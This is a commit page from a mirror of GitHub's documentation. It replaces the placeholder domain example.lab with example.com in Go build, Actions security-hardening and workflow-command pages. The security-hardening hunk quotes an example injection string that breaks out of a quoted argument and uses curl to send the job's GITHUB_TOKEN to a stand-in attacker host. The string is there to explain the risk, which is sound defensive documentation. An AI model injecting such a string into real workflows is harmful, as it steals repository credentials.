jprdonnelly/docs
1
0
Fork 0
mirror of synced 2025-12-22 11:26:57 -05:00
Code Issues Projects Releases Wiki Activity

Switch example.lab to example.com (#32500)

Browse Source 
Co-authored-by: Laura Coursen <lecoursen@github.com>
This commit is contained in:
Martin Lopes
2022-11-11 04:55:20 +10:00
committed by GitHub
parent d82f268a6f
commit c0ea72f4dc
3 changed files with 5 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
content/actions/automating-builds-and-tests/building-and-testing-go.md
View File

@@ -120,8 +120,8 @@ You can use `go get` to install dependencies:
- name: Install dependencies
run: |
go get .
go get example.lab/octo-examplemodule
go get example.lab/octo-examplemodule@v1.3.4
go get example.com/octo-examplemodule
go get example.com/octo-examplemodule@v1.3.4
```
{% ifversion actions-caching %}

2
content/actions/security-guides/security-hardening-for-github-actions.md
View File

@@ -245,7 +245,7 @@ An attacker can exfiltrate any stolen secrets or other data from the runner. To
### Stealing the job's `GITHUB_TOKEN`
It is possible for an attacker to steal a job's `GITHUB_TOKEN`. The {% data variables.product.prodname_actions %} runner automatically receives a generated `GITHUB_TOKEN` with permissions that are limited to just the repository that contains the workflow, and the token expires after the job has completed. Once expired, the token is no longer useful to an attacker. To work around this limitation, they can automate the attack and perform it in fractions of a second by calling an attacker-controlled server with the token, for example: `a"; set +e; curl http://example.lab?token=$GITHUB_TOKEN;#`.
It is possible for an attacker to steal a job's `GITHUB_TOKEN`. The {% data variables.product.prodname_actions %} runner automatically receives a generated `GITHUB_TOKEN` with permissions that are limited to just the repository that contains the workflow, and the token expires after the job has completed. Once expired, the token is no longer useful to an attacker. To work around this limitation, they can automate the attack and perform it in fractions of a second by calling an attacker-controlled server with the token, for example: `a"; set +e; curl http://example.com?token=$GITHUB_TOKEN;#`.
### Modifying the contents of a repository

4
content/actions/using-workflows/workflow-commands-for-github-actions.md
View File

@@ -709,7 +709,7 @@ steps:
id: step_one
run: |
echo 'JSON_RESPONSE<<EOF' >> $GITHUB_ENV
curl https://example.lab >> $GITHUB_ENV
curl https://example.com >> $GITHUB_ENV
echo 'EOF' >> $GITHUB_ENV
```
@@ -723,7 +723,7 @@ steps:
id: step_one
run: |
"JSON_RESPONSE<<EOF" >> $env:GITHUB_ENV
(Invoke-WebRequest -Uri "https://example.lab").Content >> $env:GITHUB_ENV
(Invoke-WebRequest -Uri "https://example.com").Content >> $env:GITHUB_ENV
"EOF" >> $env:GITHUB_ENV
shell: pwsh
```